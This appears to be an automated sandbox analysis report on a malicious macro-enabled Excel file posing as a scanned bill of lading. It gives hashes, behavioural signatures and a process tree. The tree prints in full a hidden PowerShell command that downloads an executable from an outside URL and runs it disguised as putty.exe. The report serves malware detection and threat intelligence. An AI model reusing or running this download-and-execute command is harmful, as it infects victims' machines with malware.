Analysis
-
max time kernel
144s -
max time network
146s -
platform
windows10_x64 -
resource
win10v200430 -
submitted
30-06-2020 06:47
Static task
static1
Behavioral task
behavioral1
Sample
Scan Bill of Lading.xlsm
Resource
win7
Behavioral task
behavioral2
Sample
Scan Bill of Lading.xlsm
Resource
win10v200430
General
-
Target
Scan Bill of Lading.xlsm
-
Size
398KB
-
MD5
937aa5650aa985dd443f4a03156967c9
-
SHA1
f40cd6481a66c1608a6b97580fe69f2e4904ed6d
-
SHA256
f4dcd21a2e0b2f4432b665157a1f934e5063be6bbf7ef5f92b365bbbeca92331
-
SHA512
8113094f933fbd159ec1d37bd7da487e42a515bfba57c6de6c82358223b2e202c6b592ea8fff18568694ca58fdbaebfb60b53f7974743a8c8c9f4abc1af68b93
Malware Config
Extracted
https://kyivremont.com/vbc.exe
Signatures
-
Suspicious behavior: EnumeratesProcesses 20 IoCs
Processes:
powershell.exeputty.exeWerFault.exepid process 3680 powershell.exe 3680 powershell.exe 3680 powershell.exe 2924 putty.exe 3296 WerFault.exe 3296 WerFault.exe 3296 WerFault.exe 3296 WerFault.exe 3296 WerFault.exe 3296 WerFault.exe 3296 WerFault.exe 3296 WerFault.exe 3296 WerFault.exe 3296 WerFault.exe 3296 WerFault.exe 3296 WerFault.exe 3296 WerFault.exe 3296 WerFault.exe 3296 WerFault.exe 3296 WerFault.exe -
Executes dropped EXE 1 IoCs
Processes:
putty.exepid process 2924 putty.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Blacklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 16 3680 powershell.exe -
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 3296 2924 WerFault.exe putty.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Suspicious use of SetWindowsHookEx 14 IoCs
Processes:
EXCEL.EXEpid process 1508 EXCEL.EXE 1508 EXCEL.EXE 1508 EXCEL.EXE 1508 EXCEL.EXE 1508 EXCEL.EXE 1508 EXCEL.EXE 1508 EXCEL.EXE 1508 EXCEL.EXE 1508 EXCEL.EXE 1508 EXCEL.EXE 1508 EXCEL.EXE 1508 EXCEL.EXE 1508 EXCEL.EXE 1508 EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 1508 EXCEL.EXE -
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
powershell.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 3680 1508 powershell.exe EXCEL.EXE -
Suspicious use of WriteProcessMemory 5 IoCs
Processes:
EXCEL.EXEpowershell.exedescription pid process target process PID 1508 wrote to memory of 3680 1508 EXCEL.EXE powershell.exe PID 1508 wrote to memory of 3680 1508 EXCEL.EXE powershell.exe PID 3680 wrote to memory of 2924 3680 powershell.exe putty.exe PID 3680 wrote to memory of 2924 3680 powershell.exe putty.exe PID 3680 wrote to memory of 2924 3680 powershell.exe putty.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
powershell.exeputty.exeWerFault.exedescription pid process Token: SeDebugPrivilege 3680 powershell.exe Token: SeDebugPrivilege 2924 putty.exe Token: SeRestorePrivilege 3296 WerFault.exe Token: SeBackupPrivilege 3296 WerFault.exe Token: SeDebugPrivilege 3296 WerFault.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Scan Bill of Lading.xlsm"1⤵
- Enumerates system info in registry
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('https://kyivremont.com/vbc.exe',$env:Temp+'\putty.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\putty.exe')2⤵
- Suspicious behavior: EnumeratesProcesses
- Blacklisted process makes network request
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\putty.exe"C:\Users\Admin\AppData\Local\Temp\putty.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 8884⤵
- Suspicious behavior: EnumeratesProcesses
- Program crash
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\putty.exe
-
C:\Users\Admin\AppData\Local\Temp\putty.exe
-
memory/2924-17-0x0000000000000000-mapping.dmp
-
memory/2924-154-0x0000000000000000-mapping.dmp
-
memory/2924-156-0x0000000000000000-mapping.dmp
-
memory/2924-10-0x0000000000000000-mapping.dmp
-
memory/2924-15-0x0000000000000000-mapping.dmp
-
memory/2924-11-0x0000000000000000-mapping.dmp
-
memory/2924-12-0x0000000000000000-mapping.dmp
-
memory/2924-13-0x0000000000000000-mapping.dmp
-
memory/2924-150-0x0000000000000000-mapping.dmp
-
memory/2924-16-0x0000000000000000-mapping.dmp
-
memory/2924-155-0x0000000000000000-mapping.dmp
-
memory/2924-153-0x0000000000000000-mapping.dmp
-
memory/2924-14-0x0000000000000000-mapping.dmp
-
memory/2924-149-0x0000000000000000-mapping.dmp
-
memory/2924-151-0x0000000000000000-mapping.dmp
-
memory/2924-152-0x0000000000000000-mapping.dmp
-
memory/2924-6-0x0000000000000000-mapping.dmp
-
memory/3296-9-0x0000000004D10000-0x0000000004D11000-memory.dmpFilesize
4KB
-
memory/3296-159-0x0000000004CD0000-0x0000000004CD1000-memory.dmpFilesize
4KB
-
memory/3296-19-0x0000000005490000-0x0000000005491000-memory.dmpFilesize
4KB
-
memory/3296-157-0x0000000005560000-0x0000000005561000-memory.dmpFilesize
4KB
-
memory/3680-5-0x0000000000000000-mapping.dmp